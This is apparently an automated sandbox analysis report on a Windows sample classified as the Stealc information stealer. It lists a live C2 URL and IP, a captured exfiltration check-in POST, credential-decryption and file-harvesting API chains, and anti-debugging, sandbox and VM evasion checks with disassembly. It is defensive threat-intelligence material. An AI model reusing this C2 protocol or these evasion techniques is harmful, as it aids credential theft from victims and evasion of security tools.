Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1541095
MD5: 3232476789303ec2731e9ccce8937fea
SHA1: 9d2054302efc53083547e139d7f8a7487e909c89
SHA256: 8e46ac374c025d82eb6c7c0db64706ce2546735b1dc5758087fb6fbe9041af84
Tags: exeuser-Bitsight
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

barindex
Source: file.exe Avira: detected
Source: http://185.215.113.37/ URL Reputation: Label: malware
Source: http://185.215.113.37 URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php URL Reputation: Label: malware
Source: 0.2.file.exe.af0000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: file.exe ReversingLabs: Detection: 47%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_00AFC820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00AF9AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00AF7240
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF9B60 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00AF9B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B08EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_00B08EA0
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00B038B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B04910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00B04910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00AFDA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00AFE430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00AFED20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B04570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00B04570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B03EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00B03EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00AFF6B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00AF16D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00AFDE10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00AFBE70

Networking

barindex
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHCHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 35 37 32 41 32 38 44 32 36 37 39 34 33 34 30 30 30 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="hwid"A0572A28D267943400063------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="build"doma------CAFBGHIDBGHJJKFHJDHC--
Source: Joe Sandbox View IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_00AF4880
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: unknown HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHCHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 35 37 32 41 32 38 44 32 36 37 39 34 33 34 30 30 30 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="hwid"A0572A28D267943400063------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="build"doma------CAFBGHIDBGHJJKFHJDHC--
Source: file.exe, 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2182986141.00000000018E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2182986141.00000000018E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2182986141.0000000001902000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2182986141.0000000001915000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2182986141.00000000018D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2182986141.0000000001902000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php%M
Source: file.exe, 00000000.00000002.2182986141.0000000001902000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpqM
Source: file.exe, 00000000.00000002.2182986141.00000000018E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/l
Source: file.exe, 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37G

System Summary

barindex
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 0_2_00EB08C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB51E0 0_2_00EB51E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EBB9A6 0_2_00EBB9A6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB1954 0_2_00EB1954
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EAC92D 0_2_00EAC92D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EAB112 0_2_00EAB112
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB827D 0_2_00EB827D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EAE333 0_2_00EAE333
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB331D 0_2_00EB331D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA2C70 0_2_00EA2C70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E9043A 0_2_00E9043A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D9FD81 0_2_00D9FD81
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB9D46 0_2_00EB9D46
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EA9E65 0_2_00EA9E65
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E0CFF5 0_2_00E0CFF5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F257B4 0_2_00F257B4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D6879F 0_2_00D6879F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB6774 0_2_00EB6774
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00AF45C0 appears 316 times
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: oxbstytm ZLIB complexity 0.9948882211538461
Source: file.exe, 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2140370390.0000000005480000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B08680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_00B08680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B03720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_00B03720
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\42GZ7YUB.htm Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe ReversingLabs: Detection: 47%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: file.exe Static file information: File size 1820160 > 1048576
Source: file.exe Static PE information: Raw size of oxbstytm is bigger than: 0x100000 < 0x196400

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.af0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;oxbstytm:EW;yzvcyrux:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;oxbstytm:EW;yzvcyrux:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B09860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00B09860
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: file.exe Static PE information: real checksum: 0x1c612d should be: 0x1c6f15
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: oxbstytm
Source: file.exe Static PE information: section name: yzvcyrux
Source: file.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F138FF push ebp; mov dword ptr [esp], edx 0_2_00F13909
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F388D5 push 6AD28FF2h; mov dword ptr [esp], ecx 0_2_00F3895E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F388D5 push 5ED95401h; mov dword ptr [esp], edx 0_2_00F389A9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F388D5 push ebp; mov dword ptr [esp], eax 0_2_00F389CE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push esi; mov dword ptr [esp], 7F1C28C1h 0_2_00EB090B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push edx; mov dword ptr [esp], ebp 0_2_00EB09FB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push edi; mov dword ptr [esp], edx 0_2_00EB0A29
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push eax; mov dword ptr [esp], edx 0_2_00EB0A91
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push ebx; mov dword ptr [esp], eax 0_2_00EB0B49
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push esi; mov dword ptr [esp], esp 0_2_00EB0B73
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push 68F7BF9Eh; mov dword ptr [esp], ebx 0_2_00EB0C9D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push edi; mov dword ptr [esp], eax 0_2_00EB0CCD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push 7D942431h; mov dword ptr [esp], ecx 0_2_00EB0D20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push esi; mov dword ptr [esp], eax 0_2_00EB0D53
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push 0A548464h; mov dword ptr [esp], edx 0_2_00EB0D74
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push ebx; mov dword ptr [esp], eax 0_2_00EB0DEC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push 0770DB0Bh; mov dword ptr [esp], ecx 0_2_00EB0E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push 5C0CC3EBh; mov dword ptr [esp], eax 0_2_00EB0E29
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push edx; mov dword ptr [esp], ebp 0_2_00EB0E4B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push 06CF39DFh; mov dword ptr [esp], ebp 0_2_00EB0EAD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push ebx; mov dword ptr [esp], ebp 0_2_00EB0EE9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push 4C65E077h; mov dword ptr [esp], ebx 0_2_00EB0F64
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push 5AF5E3FBh; mov dword ptr [esp], ebx 0_2_00EB0F8C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push eax; mov dword ptr [esp], ecx 0_2_00EB100C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push 70C116A9h; mov dword ptr [esp], eax 0_2_00EB108F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push 3B2BA97Dh; mov dword ptr [esp], eax 0_2_00EB10E7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push esi; mov dword ptr [esp], esp 0_2_00EB1111
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push ebx; mov dword ptr [esp], 1435C863h 0_2_00EB112E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB08C0 push eax; mov dword ptr [esp], esp 0_2_00EB11D4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01179174 push 0AB5F4ABh; mov dword ptr [esp], edx 0_2_0117919E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01179174 push eax; mov dword ptr [esp], ecx 0_2_011791C3
Source: file.exe Static PE information: section name: oxbstytm entropy: 7.954384653876487

Boot Survival

barindex
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B09860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00B09860

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D521BC second address: D521C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D521C6 second address: D521CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D521CC second address: D519BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007FC221A94B2Fh 0x0000000e push dword ptr [ebp+122D04E9h] 0x00000014 jmp 00007FC221A94B2Bh 0x00000019 call dword ptr [ebp+122D2819h] 0x0000001f pushad 0x00000020 jmp 00007FC221A94B37h 0x00000025 xor eax, eax 0x00000027 jmp 00007FC221A94B34h 0x0000002c mov edx, dword ptr [esp+28h] 0x00000030 stc 0x00000031 sub dword ptr [ebp+122D2F78h], edi 0x00000037 mov dword ptr [ebp+122D2B56h], eax 0x0000003d jmp 00007FC221A94B2Eh 0x00000042 mov esi, 0000003Ch 0x00000047 mov dword ptr [ebp+122D19E9h], edi 0x0000004d add esi, dword ptr [esp+24h] 0x00000051 jno 00007FC221A94B2Ch 0x00000057 lodsw 0x00000059 pushad 0x0000005a jnl 00007FC221A94B2Ch 0x00000060 mov ecx, dword ptr [ebp+122D2B16h] 0x00000066 popad 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b mov dword ptr [ebp+122D1B69h], edx 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 clc 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 jnp 00007FC221A94B3Eh 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC2295 second address: EC229B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC229B second address: EC22A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FC221A94B26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC22A8 second address: EC22AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC22AE second address: EC22B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAFA4D second address: EAFA51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAFA51 second address: EAFA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAFA5B second address: EAFA87 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edi 0x0000000f jo 00007FC220745E0Dh 0x00000015 jne 00007FC220745DF6h 0x0000001b jmp 00007FC220745E01h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAFA87 second address: EAFAA1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC221A94B34h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAFAA1 second address: EAFAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
